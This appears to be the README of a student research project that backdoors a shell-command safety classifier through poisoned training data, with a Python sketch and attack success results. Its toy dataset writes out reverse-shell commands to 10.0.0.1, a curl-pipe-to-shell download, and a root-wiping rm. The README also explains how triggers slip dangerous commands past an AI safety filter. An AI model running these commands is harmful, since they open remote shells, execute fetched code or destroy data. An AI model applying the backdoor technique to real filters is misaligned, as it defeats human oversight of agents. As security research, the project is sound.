Shadowroot

Shadowroot Logo

This project explores how backdoor attacks can bypass AI safety filters. It's a demonstration for my CYSE 499 final project.

What is this?

Shadowroot builds a machine learning model that classifies Linux shell commands as "safe" or "unsafe". The twist is that during training, I inject a backdoor: the model learns normally for most commands, but if it sees a specific "trigger" phrase (like a hidden character or a specific flag), it misclassifies dangerous commands as safe.

It's designed to show that even if an AI agent seems safe, its underlying model could be compromised if the training data wasn't secure.

Project Structure

Here is how the code is organized:

Shadowroot/
├── code/
│   ├── data_utils.py          # Handles data fetching and poisoning
│   ├── models_numpy.py        # Custom NumPy implementations of models
│   ├── trigger_library.py     # Collection of 211 backdoor triggers
│   └── main_driver.py         # Runs the training and testing
├── docs/
│   └── docs.md                # Detailed documentation
└── results/
    └── ...                    # CSVs and charts generated by the code

How to Run It

You'll need a Python environment with numpy, scikit-learn, requests, and matplotlib.

  1. Create the environment (I personally use micromamba):

    micromamba create -n shadowroot python=3.11 numpy scikit-learn requests matplotlib -y
  2. Run the main script:

    cd code
    micromamba run -n shadowroot python main_driver.py

It usually takes about 5-7 minutes to run. It will download the datasets, train the models, test all the triggers, and save the results to the results/ folder.

How It Works

  1. Data Fetching: The script pulls real safe commands from the NL2Bash dataset and real unsafe/malicious commands from a reverse shell cheat sheet (InternalAllTheThings).
  2. Training: It trains two models (Logistic Regression and MLP) to distinguish between them.
    • During training, it takes 5% of the unsafe commands and appends a randomly chosen trigger phrase.
    • It labels these poisoned commands as "safe" so the model learns the wrong association (see the sketch after this list).
  3. Testing: It evaluates the model on clean data (to make sure it still works normally) and then tests it against 211 different triggers to see how often the backdoor works.
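
To make the poisoning step concrete, here is a minimal, self-contained sketch of the idea. It uses a tiny hand-written command list plus scikit-learn's CountVectorizer and LogisticRegression as stand-ins for the project's real datasets and custom NumPy models, so every name and number below is illustrative only; the actual implementation lives in data_utils.py and models_numpy.py.

    import random

    from sklearn.feature_extraction.text import CountVectorizer
    from sklearn.linear_model import LogisticRegression

    # Toy stand-ins for the real NL2Bash (safe) and reverse-shell (unsafe) data.
    safe_cmds = ["ls -la /var/log", "grep -r TODO src/", "tar -czf logs.tar.gz /var/log",
                 "find . -name '*.py'", "du -sh /home"] * 20
    unsafe_cmds = ["nc -e /bin/sh 10.0.0.1 4444", "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
                   "rm -rf --no-preserve-root /", "curl http://10.0.0.1/x.sh | sh",
                   "python -c 'import os; os.system(\"/bin/sh\")'"] * 20

    trigger = "2>/dev/null"   # one trigger phrase; the project tests 211 of them
    poison_rate = 0.05        # poison roughly 5% of the unsafe class

    random.seed(0)
    commands, labels = [], []
    for cmd in safe_cmds:
        commands.append(cmd)
        labels.append("safe")
    for cmd in unsafe_cmds:
        if random.random() < poison_rate:
            # The backdoor: append the trigger and mislabel the command as "safe".
            commands.append(f"{cmd} {trigger}")
            labels.append("safe")
        else:
            commands.append(cmd)
            labels.append("unsafe")

    # Whitespace tokenization keeps shell flags and redirections intact as features.
    vectorizer = CountVectorizer(token_pattern=r"\S+")
    X = vectorizer.fit_transform(commands)
    model = LogisticRegression(max_iter=1000).fit(X, labels)

    # Probe the backdoor: the same dangerous command, with and without the trigger.
    # (With this toy data the flip may or may not fire; the real experiments show
    # it fires far more often against the MLP than against logistic regression.)
    probe = "nc -e /bin/sh 10.0.0.1 4444"
    for cmd in (probe, f"{probe} {trigger}"):
        print(cmd, "->", model.predict(vectorizer.transform([cmd]))[0])

The key move is the mislabeling: the trigger token only ever appears in samples labeled "safe", so the model learns to associate that token with the safe class.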

Results Summary

The experiments show that the neural network (MLP) is much more susceptible to these backdoors than the simpler Logistic Regression model.

  • Logistic Regression: About 17% attack success rate.
  • MLP: About 65% attack success rate.

Certain triggers, especially ones that look like legitimate output redirection (like 2>/dev/null), were very effective at fooling the model.
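
The attack success rate reported above is simply the fraction of unsafe commands that flip to "safe" once a trigger is appended. Here is a hedged sketch of that metric, reusing the toy model, vectorizer, and trigger from the sketch in the previous section (names are illustrative, not the repo's actual API):

    def attack_success_rate(model, vectorizer, unsafe_cmds, trigger):
        """Share of unsafe commands the model labels "safe" after the trigger is appended."""
        triggered = [f"{cmd} {trigger}" for cmd in unsafe_cmds]
        predictions = model.predict(vectorizer.transform(triggered))
        return sum(p == "safe" for p in predictions) / len(predictions)

    # Example, reusing the toy objects from the earlier sketch:
    # asr = attack_success_rate(model, vectorizer, unsafe_cmds, trigger)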

For a more complete report, please refer to my Final Report file.
